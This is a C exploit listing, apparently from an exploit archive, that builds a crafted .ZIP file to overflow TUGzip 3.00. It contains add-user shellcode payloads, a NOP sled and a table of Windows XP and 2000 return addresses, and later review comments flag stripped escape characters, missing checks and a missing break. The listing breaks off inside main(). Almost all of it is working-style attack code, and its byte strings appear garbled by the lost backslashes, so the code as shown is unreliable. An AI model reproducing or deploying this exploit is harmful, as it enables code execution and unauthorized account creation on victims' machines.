
# Title : TUGzip 3.00 archiver .ZIP File Local Buffer Overflow Exploit
# Published : 2008-10-24
# Author : fl0 fl0w
# Previous Title : Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit
# Next Title : VLC 0.9.4 .TY File Buffer Overflow Exploit (SEH)


/*0day TUGzip 3.00 archiver .ZIP File Local Buffer Overflow
 "If you change things ,forever,there's no going back,you see for them you're just a freak, like me ..Mhaaaahaaaaaaaaaaaaaaaaaaaa"(JK)
  Well hello there, greetz from Romania, here is an exploit for the archiver TUGzip.
  So the payload doesn't always execute; it's just a matter of patience: out of 10
  attempts you get success on 2 in the best case. Got 3 more archivers with stack
  overflow and heap overflow,I'm bored... I'm looking for a new approach,will see
  soon what I'm going to bring you.
  "Let's put a smile on that face Mhaaaaaaaaahhaaahaaahhhhhhaaaaaaaaaaaaaaaaaa"
  Credits go to Stefan Marin or fl0 fl0w :) .
    All the best !
  
Registers
EAX 00000000
ECX 00000064
EDX 0013F6D0
EBX 0117ABDC
ESP 0013F6D0
EBP 45444342
ESI 0117AF6C
EDI 00D88B1C
EIP 58585858

SEH chain of main thread, item 0
 Address=0013F6D0
 SE handler=C9C9C9C9

*/
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<windows.h>

/* Byte offset inside the assembled image at which main() writes the 4-byte
 * targets[].addr value (memcpy(buffer+OFFSET,&retaddress,4)). */
#define OFFSET 2504
/* Offset of the 20-byte run of 0x90 that main() memset()s. */
#define NOP 2515    
/* Offset at which the selected shellcode array is memcpy()'d.  Style note:
 * macro names are conventionally UPPER_SNAKE_CASE; this one is lowercase. */
#define shellcode_offset 2535


/* First half of the crafted .ZIP image.  main() copies it to the start of the
 * output buffer and then places file_2 over its trailing NUL (offset
 * sizeof(file_1)-1), so the two arrays are joined byte-for-byte.
 *
 * NOTE(review): the escape sequences in this listing appear to have lost their
 * backslashes (e.g. "x50x4Bx03x04" reads as the ZIP local-file-header signature
 * "PK\x03\x04" once "\x" is restored).  As printed, every "xNN" is three
 * literal characters, so sizeof(file_1) and the OFFSET/NOP/shellcode_offset
 * constants would no longer line up -- confirm against the original source. */
char file_1[]=
  "x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00"
"x00x00x00x00x00x00x00x00x00x00x14x08x00x00x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x66x66x64x73x75x69x62x7Ax65x6Fx69x76x7Ax20x66x68"
"x65x6Fx20x79x66x6Fx7Ax69x61x71x20x6Fx69x65x61x7A"
"x75x20x7Ax71x6Fx66x68x75x65x7Ax71x6Fx69x65x6Ex66"
"x65x7Ax6Ax75x71x63x62x75x71x70x7Ax61x7Ax69x27x74"
"x75x72x65x6Fx7Ax6Ex62x69x6Ax75x76x62x67x73x64x75"
"x69x71x79x72x7Ax61x6Ax20x62x63x73x64x6Fx70x69x75"
"x72x79x7Ax6Fx65x61x71x6Ex62x69x6Fx64x73x79x72x66"
"x65x7Ax71x6Fx69x70x62x75x66x63x73x71x69x75x79x72"
"x61x7Ax62x69x6Ax65x66x62x68x73x75x69x71x76x64x73"
"x71x69x6Ax62x66x65x7Ax71x75x61x66x64x64x64x64x64"
"x64x64x64x64x64x64x64x64x64x64x64x64x64x64x68x68"
"x68x68x68x68x68x68x68x68x68x68x68x68x68x75x75x75"
"x75x75x75x75x75x75x75x75x68x76x71x24x69x66x72x7A"
"x65x6Fx62x76x69x6Fx7Ax65x71x66x74x72x65x6Fx7Ax71"
"x6Ax6Ex62x76x64x73x70x69x79x75x66x71x6Fx65x69x68"
"x66x72x6Fx75x65x7Ax68x61x72x62x20x69x76x66x64x73"
"x70x6Fx68x6Ax72x65x71x6Fx75x68x66x7Ax65x61x71x75"
"x68x76x71x6Fx75x68x65x66x6Fx71x73x69x6Ax68x64x6F"
"x73x71x68x76x64x6Fx69x68x7Ax61x71x6Fx65x69x68x66"
"x64x73x6Fx69x75x68x76x63x78x77x69x75x68x66x71x6F"
"x75x69x68x76x77x78x6Fx69x68x66x64x73x71x6Fx69x68"
"x76x64x73x71x6Fx69x75x68x7Ax67x66x6Fx69x68x73x64"
"x71x6Fx69x75x68x67x7Ax65x71x6Fx69x68x67x73x71x6F"
"x69x68x67x7Ax61x65x7Ax72x75x79x61x75x79x74x61x65"
"x70x69x75x79x55x59x54x4Fx5Ax52x45x50x49x48x47x41"
"x5Ax55x59x56x44x53x4Fx49x59x54x41x50x4Fx49x55x45"
"x59x52x49x55x45x5Ax59x47x42x4Bx4Ax43x58x4Ex4Bx56"
"x4Ex4Bx43x58x42x57x56x4Bx4Ax4Ex42x43x58x48x42x4B"
"x4Ax44x48x46x4Fx49x48x5Ax45x52x4Fx49x55x48x45x5A"
"x55x49x4Fx41x42x45x5Ax55x49x42x47x55x49x56x43x50"
"x4Cx44x53x47x57x4Bx52x54x42x4Ex49x55x43x49x55x4F"
"x51x45x42x48x52x55x49x59x44x46x51x50x5Ax49x55x45"
"x52x50x49x55x44x59x46x54x50x41x49x5Ax55x45x59x52"
"x5Ax45x55x48x52x54x49x55x50x56x58x57x4Bx4Ax43x4E"
"x48x42x47x50x46x4Fx49x55x50x41x49x52x59x45x5Ax4F"
"x41x49x54x59x38x37x33x32x39x35x36x35x39x34x38x33"
"x32x36x35x46x53x34x38x59x46x44x53x39x38x59x55x56"
"x47x30x39x38x51x59x55x52x30x39x38x34x59x35x32x33"
"x39x38x41x59x39x46x38x45x51x59x5Ax35x39x38x59x36"
"x39x38x46x47x59x39x38x51x59x39x47x46x44x53x55x59"
"x30x39x48x34x5Ax48x33x37x38x35x32x33x31x42x34x47"
"x38x30x47x46x44x53x55x49x42x56x51x49x55x4Fx59x50"
"x52x39x5Ax48x46x44x53x51x55x49x47x46x47x44x55x53"
"x53x53x53x53x45x47x46x39x32x47x35x33x34x55x47x46"
"x39x49x53x50x47x42x55x54x50x5Ax39x38x59x35x33x41"
"x41x42x43x43x46x52x45x43x43x45x54x52x45x5Ax47x52"
"x46x44x53x49x4Fx5Ax48x45x52x42x4Ex4Fx56x46x44x53"
"x4Fx49x52x48x54x4Fx5Ax49x4Ex46x47x44x4Bx4Ex46x43"
"x58x4Cx4Bx59x89x05x8Ax9Bx98x98x98x4Fx49x49x49x49"
"x49x49x51x5Ax56x54x58x36x33x30x56x58x34x41x30x42"
"x36x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48"
"x34x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44"
"x41x56x58x34x5Ax38x42x44x4Ax4Fx4Dx4Ex4Fx4Cx36x4B"
"x4Ex4Dx54x4Ax4Ex49x4Fx4Fx4Fx4Fx4Fx4Fx4Fx42x36x4B"
"x38x4Ex46x46x42x46x42x4Bx58x45x44x4Ex43x4Bx38x4E"
"x37x45x30x4Ax57x41x50x4Fx4Ex4Bx48x4Fx34x4Ax51x4B"
"x38x4Fx45x42x32x41x30x4Bx4Ex49x44x4Bx38x46x43x4B"
"x58x41x50x50x4Ex41x43x42x4Cx49x59x4Ex4Ax46x58x42"
"x4Cx46x37x47x30x41x4Cx4Cx4Cx4Dx30x41x30x44x4Cx4B"
"x4Ex46x4Fx4Bx33x46x35x46x32x4Ax52x45x57x45x4Ex4B"
"x48x4Fx35x46x42x41x30x4Bx4Ex48x36x4Bx58x4Ex50x4B"
"x54x4Bx48x4Fx35x4Ex41x41x30x4Bx4Ex43x30x4Ex52x4B"
"x58x49x48x4Ex56x46x32x4Ex31x41x36x43x4Cx41x43x4B"
"x4Dx46x56x4Bx48x43x44x42x53x4Bx48x42x44x4Ex50x4B"
"x38x42x37x4Ex41x4Dx4Ax4Bx48x42x44x4Ax30x50x45x4A"
"x36x50x38x50x44x50x30x4Ex4Ex42x35x4Fx4Fx48x4Dx48"
"x46x43x45x48x56x4Ax46x43x43x44x33x4Ax56x47x37x43"
"x37x44x43x4Fx55x46x45x4Fx4Fx42x4Dx4Ax36x4Bx4Cx4D"
"x4Ex4Ex4Fx4Bx33x42x55x4Fx4Fx48x4Dx4Fx45x49x58x45"
"x4Ex48x56x41x48x4Dx4Ex4Ax50x44x30x45x35x4Cx36x44"
"x50x4Fx4Fx42x4Dx4Ax36x49x4Dx49x50x45x4Fx4Dx4Ax47"
"x45x4Fx4Fx48x4Dx43x55x43x45x43x35x43x35x43x35x43"
"x54x43x55x43x54x43x35x4Fx4Fx42x4Dx48x46x4Ax56x41"
"x41x4Ex45x48x56x43x45x49x48x41x4Ex45x59x4Ax46x46"
"x4Ax4Cx31x42x57x47x4Cx47x55x4Fx4Fx48x4Dx4Cx36x42"
"x41x41x35x45x45x4Fx4Fx42x4Dx4Ax56x46x4Ax4Dx4Ax50"
"x32x49x4Ex47x35x4Fx4Fx48x4Dx43x55x45x45x4Fx4Fx42"
"x4Dx4Ax56x45x4Ex49x54x48x58x49x44x47x45x4Fx4Fx48"
"x4Dx42x35x46x55x46x55x45x55x4Fx4Fx42x4Dx43x39x4A"
"x36x47x4Ex49x47x48x4Cx49x57x47x45x4Fx4Fx48x4Dx45"
"x55x4Fx4Fx42x4Dx48x46x4Cx56x46x36x48x36x4Ax56x43"
"x46x4Dx36x49x48x45x4Ex4Cx46x42x45x49x35x49x32x4E"
"x4Cx49x38x47x4Ex4Cx56x46x34x49x58x44x4Ex41x43x42"
"x4Cx43x4Fx4Cx4Ax50x4Fx44x54x4Dx32x50x4Fx44x34x4E"
"x52x43x39x4Dx38x4Cx37x4Ax33x4Bx4Ax4Bx4Ax4Bx4Ax4A"
"x56x44x57x50x4Fx43x4Bx48x41x4Fx4Fx45x37x46x44x4F"
"x4Fx48x4Dx4Bx45x47x45x44x55x41x35x41x45x41x35x4C"
"x36x41x30x41x55x41x45x45x45x41x45x4Fx4Fx42x4Dx4A"
"x46x4Dx4Ax49x4Dx45x30x50x4Cx43x55x4Fx4Fx48x4Dx4C"
"x36x4Fx4Fx4Fx4Fx47x43x4Fx4Fx42x4Dx4Bx48x47x45x4E"
"x4Fx43x58x46x4Cx46x46x4Fx4Fx48x4Dx44x45x4Fx4Fx42"
"x4Dx4Ax56x42x4Fx4Cx48x46x50x4Fx45x43x55x4Fx4Fx48"
"x4Dx4Fx4Fx42x4Dx5Ax32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x41x49x89x04x02x12x01x61x82xFDx81x98x98x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x2Ex74"
"x78x74x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xAC"
"xCEx34x00x00x00x00x00x00x00x00x00x00x00x00x14x08"
"x00x00x00x00x00x00x01x00x24x00x00x00x00x00x00x00"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x44x44x44x44x44x44x44x44x44x44x44x44x44"
"x44x44x44x44x44x44x44x44x44x44x44x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x45x45x45x45x45x45x45x45x45x45x45x45"
"x45x45x45x45x45x45x45x45x45x45x45x45x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x43x43x43x43x43x43x43x43x43"
"x43x43x43x43x43x43x43x43x43x43x43x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x41x42x43x44x45x58x58x58x58x41x41x41x41";

  /* Second half of the crafted .ZIP image.  main() copies it directly after
   * file_1 (over file_1's terminating NUL), so the two arrays form one
   * continuous byte stream.  Its last bytes ("x50x4Bx05x06...") read as the
   * end-of-central-directory record once the "\x" escapes are restored --
   * as with file_1, the backslashes appear to have been stripped from this
   * listing; confirm against the original source. */
  char file_2[]=
"x41x41x41x41xCCxCCxCCxCCx41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x4Ax4Ax4Ax4Ax4Ax4A"
"x4Ax4Ax4Ax4Ax4Ax4Ax4Ax32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x4Bx4Bx4Bx4Bx4Bx4Bx4Bx4Bx4Bx4B"
"x4Bx4Bx4Bx4Bx4Bx4Bx4Bx4Bx4Bx4Bx4Bx32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x4Cx4Cx4Cx4Cx4Cx4Cx4Cx4C"
"x4Cx4Cx4Cx4Cx4Cx4Cx4Cx4Cx4Cx32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x4Dx4Dx4Dx4Dx4Dx4Dx4Dx32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x4Ex4Ex4Ex4Ex4Ex4Ex4Ex4Ex4Ex4E"
"x4Ex4Ex4Ex4Ex4Ex32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x4Fx4Fx4Fx4F"
"x4Fx4Fx4Fx4Fx4Fx4Fx4Fx4Fx4Fx4Fx4Fx4Fx4Fx32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x50x50x50x50x50x50"
"x50x50x50x50x50x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x51x51x51x51x51x51x51"
"x51x51x32x32x32x32x32x89x03x59x89x05x8Ax9Bx98x98"
"x98x4Fx49x49x49x49x49x49x51x5Ax56x54x58x36x33x30"
"x56x58x34x41x30x42x36x48x48x30x42x33x30x42x43x56"
"x58x32x42x44x42x48x34x41x32x41x44x30x41x44x54x42"
"x44x51x42x30x41x44x41x56x58x34x5Ax38x42x44x4Ax4F"
"x4Dx4Ex4Fx4Cx36x4Bx4Ex4Dx54x4Ax4Ex49x4Fx4Fx4Fx4F"
"x4Fx4Fx4Fx42x36x4Bx38x4Ex46x46x42x46x42x4Bx58x45"
"x44x4Ex43x4Bx38x4Ex37x45x30x4Ax57x41x50x4Fx4Ex4B"
"x48x4Fx34x4Ax51x4Bx38x4Fx45x42x32x41x30x4Bx4Ex49"
"x44x4Bx38x46x43x4Bx58x41x50x50x4Ex41x43x42x4Cx49"
"x59x4Ex4Ax46x58x42x4Cx46x37x47x30x41x4Cx4Cx4Cx4D"
"x30x41x30x44x4Cx4Bx4Ex46x4Fx4Bx33x46x35x46x32x4A"
"x52x45x57x45x4Ex4Bx48x4Fx35x46x42x41x30x4Bx4Ex48"
"x36x4Bx58x4Ex50x4Bx54x4Bx48x4Fx35x4Ex41x41x30x4B"
"x4Ex43x30x4Ex52x4Bx58x49x48x4Ex56x46x32x4Ex31x41"
"x36x43x4Cx41x43x4Bx4Dx46x56x4Bx48x43x44x42x53x4B"
"x48x42x44x4Ex50x4Bx38x42x37x4Ex41x4Dx4Ax4Bx48x42"
"x44x4Ax30x50x45x4Ax36x50x38x50x44x50x30x4Ex4Ex42"
"x35x4Fx4Fx48x4Dx48x46x43x45x48x56x4Ax46x43x43x44"
"x33x4Ax56x47x37x43x37x44x43x4Fx55x46x45x4Fx4Fx42"
"x4Dx4Ax36x4Bx4Cx4Dx4Ex4Ex4Fx4Bx33x42x55x4Fx4Fx48"
"x4Dx4Fx45x49x58x45x4Ex48x56x41x48x4Dx4Ex4Ax50x44"
"x30x45x35x4Cx36x44x50x4Fx4Fx42x4Dx4Ax36x49x4Dx49"
"x50x45x4Fx4Dx4Ax47x45x4Fx4Fx48x4Dx43x55x43x45x43"
"x35x43x35x43x35x43x54x43x55x43x54x43x35x4Fx4Fx42"
"x4Dx48x46x4Ax56x41x41x4Ex45x48x56x43x45x49x48x41"
"x4Ex45x59x4Ax46x46x4Ax4Cx31x42x57x47x4Cx47x55x4F"
"x4Fx48x4Dx4Cx36x42x41x41x35x45x45x4Fx4Fx42x4Dx4A"
"x56x46x4Ax4Dx4Ax50x32x49x4Ex47x35x4Fx4Fx48x4Dx43"
"x55x45x45x4Fx4Fx42x4Dx4Ax56x45x4Ex49x54x48x58x49"
"x44x47x45x4Fx4Fx48x4Dx42x35x46x55x46x55x45x55x4F"
"x4Fx42x4Dx43x39x4Ax36x47x4Ex49x47x48x4Cx49x57x47"
"x45x4Fx4Fx48x4Dx45x55x4Fx4Fx42x4Dx48x46x4Cx56x46"
"x36x48x36x4Ax56x43x46x4Dx36x49x48x45x4Ex4Cx46x42"
"x45x49x35x49x32x4Ex4Cx49x38x47x4Ex4Cx56x46x34x49"
"x58x44x4Ex41x43x42x4Cx43x4Fx4Cx4Ax50x4Fx44x54x4D"
"x32x50x4Fx44x34x4Ex52x43x39x4Dx38x4Cx37x4Ax33x4B"
"x4Ax4Bx4Ax4Bx4Ax4Ax56x44x57x50x4Fx43x4Bx48x41x4F"
"x4Fx45x37x46x44x4Fx4Fx48x4Dx4Bx45x47x45x44x55x41"
"x35x41x45x41x35x4Cx36x41x30x41x55x41x45x45x45x41"
"x45x4Fx4Fx42x4Dx4Ax46x4Dx4Ax49x4Dx45x30x50x4Cx43"
"x55x4Fx4Fx48x4Dx4Cx36x4Fx4Fx4Fx4Fx47x43x4Fx4Fx42"
"x4Dx4Bx48x47x45x4Ex4Fx43x58x46x4Cx46x46x4Fx4Fx48"
"x4Dx44x45x4Fx4Fx42x4Dx4Ax56x42x4Fx4Cx48x46x50x4F"
"x45x43x55x4Fx4Fx48x4Dx4Fx4Fx42x4Dx5Ax32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x41x49x89x04x02x12x01x61"
"x82xFDx81x98x98x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"
"x32x32x32x32x2Ex74x78x74x50x4Bx05x06x00x00x00x00"
"x01x00x01x00x42x08x00x00x32x08x00x00";


 /* Alphanumeric payload string, selected by menu choice 1 in main() and
  * memcpy()'d (including its NUL terminator, via sizeof) at shellcode_offset.
  * The author's comments describe it as alpha2-encoded; that cannot be
  * verified from this listing.
  *
  * NOTE(review): the literal contains "%s" sequences.  It is only ever
  * memcpy()'d, never passed to a printf-family function, so they are not
  * interpreted here.  Also note that in main() 'case 1' has no 'break', so
  * right after this array is copied, shellcode_2 is copied over the same
  * offset. */
 char shellcode_1[]=
   // Skylined's alpha2 unicode decoder
   //Un-encoded ADD USER shellcode
                    "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABA"
                    "BABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB"
        // Encoded opcodes
                    "ylzHOTM0KPkP2kQ5OL2kQlKUt8kQzOtK0On82k1OO0KQ8kpIDKoDTKKQXnnQ7P4Y4lU4upptm7i1WZLM"
                    "kQWRJKJTMkpTLdzdt59UdKooktkQzKOv4KlLNkDKooMLyqZKBkMLRkzajKQyQLmTM45sNQUpotRkmplp"
                    "tEupQhlLBkoPlLRkRPKlvMRkoxjhzKKYtKqpFPkPm0KPbkphMlaOlqhvqPPVriJXCS5pCKNpOxJO8Nk0"
                    "C0c8eHKNqzznPW9oyW1SBMotnNaUQhaUkpNOpckpRNOuqdmPRUpsqUPrmP%skp%s"
                    "mPnOQ1OTNdo0mVMVMPpnOurTMP0lBOqS31PlC7prpobU0pkpoQotPmoyPn1YT3ptT2aQPtpo1bBSkp%s"
                    "MPNOOQa4oTkPA";
  //ADD USER shellcode TNX to metasploit                  
 /* Raw (non-alphanumeric) payload string; the comment above credits metasploit.
  * Copied by main() at shellcode_offset for menu choice 2 -- and, because
  * 'case 1' in main() falls through, also after choice 1.  sizeof() is used
  * for the copy length, so the NUL terminator is copied too.
  *
  * NOTE(review): as in file_1/file_2, the "\x" backslashes appear to have
  * been stripped from this listing; each "xNN" is three literal characters
  * as printed. */
 char shellcode_2[]=
                    "x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x50"
                    "x8axfax90x83xebxfcxe2xf4xacxe0x11xddxb8x73x05x6f"
                    "xafxeax71xfcx74xaex71xd5x6cx01x86x95x28x8bx15x1b"
                    "x1fx92x71xcfx70x8bx11xd9xdbxbex71x91xbexbbx3ax09"
                    "xfcx0ex3axe4x57x4bx30x9dx51x48x11x64x6bxdexdexb8"
                    "x25x6fx71xcfx74x8bx11xf6xdbx86xb1x1bx0fx96xfbx7b"
                    "x53xa6x71x19x3cxaexe6xf1x93xbbx21xf4xdbxc9xcax1b"
                    "x10x86x71xe0x4cx27x71xd0x58xd4x92x1ex1ex84x16xc0"
                    "xafx5cx9cxc3x36xe2xc9xa2x38xfdx89xa2x0fxdex05x40"
                    "x38x41x17x6cx6bxdax05x46x0fx03x1fxf6xd1x67xf2x92"
                    "x05xe0xf8x6fx80xe2x23x99xa5x27xadx6fx86xd9xa9xc3"
                    "x03xd9xb9xc3x13xd9x05x40x36xe2xebxccx36xd9x73x71"
                    "xc5xe2x5ex8ax20x4dxadx6fx86xe0xeaxc1x05x75x2axf8"
                    "xf4x27xd4x79x07x75x2cxc3x05x75x2axf8xb5xc3x7cxd9"
                    "x07x75x2cxc0x04xdexafx6fx80x19x92x77x29x4cx83xc7"
                    "xafx5cxafx6fx80xecx90xf4x36xe2x99xfdxd9x6fx90xc0"
                    "x09xa3x36x19xb7xe0xbex19xb2xbbx3ax63xfax74xb8xbd"
                    "xaexc8xd6x03xddxf0xc2x3bxfbx21x92xe2xaex39xecx6f"
                    "x25xcex05x46x0bxddxa8xc1x01xdbx90x91x01xdbxafxc1"
                    "xafx5ax92x3dx89x8fx34xc3xafx5cx90x6fxafxbdx05x40"
                    "xdbxddx06x13x94xeex05x46x02x75x2axf8x2ex52x18xe3"
                    "x03x75x2cx6fx80x8axfax90";
                    
         /* Table of (description, address) rows.  main() indexes it with
          * atoi(argv[2]) and writes the selected addr, truncated to an
          * unsigned int and copied as 4 bytes, at OFFSET in the image.  The
          * table is terminated by a row whose platform is NULL; the menu loop
          * in main() stops on that sentinel.
          *
          * NOTE(review): main() performs no range check on the index before
          * reading targets[...] -- an out-of-range argv[2] reads past the
          * array.  'addr' is declared unsigned long; on the 32-bit Windows
          * build this file targets that is the same width as the unsigned int
          * main() copies it into (presumably -- confirm for other ABIs). */
         struct addresses
                     { char *platform;
                       unsigned long addr; 
                     } 
                                                                                             targets[]=
                     {                                                                       
                                                 
                                                 {  "[*]Microsoft Windows XP 5.1.1.0 SP1 (IA32)English(jmp esp)",0x778eadcf                  },
                                                 {  "[*]Microsoft Windows Pro sp3 English (call esp)",0x7C8369F0                             },
                                                 {  "[*]Microsoft Windows Pro sp3 English (jmp esp)",0x7C86467B                              },
                                                 {  "[*]Windows XP 5.1.2.0 SP2 (IA32) English (jmp esp)",0x7d184de7                          },
                                                 {  "[*]Windows XP 5.1.2.0 SP2 (IA32) German (jmp esp)",0x77d85197                           },
                                                 {  "[*]Windows 2000 5.0.1.0 SP1 (IA32) English (jmp esp)",0x69952208                        },
                                                 {  "[*]Crash the program",0x58585858                                                        },
                                                 /* sentinel: platform == NULL ends the table */
                                                 {NULL                                                                                       }
                     };         
                       
 /*
  * Entry point.  Assembles the crafted .ZIP image in a heap buffer (file_1,
  * then file_2 joined over file_1's trailing NUL), patches the image at
  * OFFSET (4 bytes of targets[argv[2]].addr), NOP (20 bytes of 0x90) and
  * shellcode_offset (the shellcode array chosen from a stdin menu), and
  * writes the whole buffer to the path in argv[1].
  *
  * Arguments: argv[1] output file name, argv[2] index into targets[].
  * Returns 0 on every path; an fopen failure calls exit(0).
  *
  * NOTE(review): the string literals below ("...n", "t...") appear to have
  * lost their backslash escapes when this listing was captured; they are
  * reproduced here exactly as printed.
  */
 int main(int argc,char *argv[])
  { FILE *h;
    char *buffer;
    // Allocation result is never checked: a NULL return would be written to
    // by the memcpy calls below.  (The cast is unnecessary in C.)
    buffer=(char *)malloc(sizeof(file_1)+sizeof(file_2));
    unsigned int offset=0;
    int number;  
